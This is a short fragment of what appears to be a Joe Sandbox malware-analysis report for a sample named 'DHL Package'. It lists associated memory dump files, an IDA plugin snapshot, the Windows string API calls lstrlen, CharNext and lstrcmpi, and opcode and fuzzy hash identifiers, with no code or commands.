                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                • Instruction ID: 98c30faecf84a4e678f1c8c5aee25e578da6ba24d366b38437dab149ad6906fd
                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                • Instruction Fuzzy Hash: 4AF06232504458FFD7029BA5DD04DAEBBA8EF16354B2540AAE884F7210D674EF01DBA9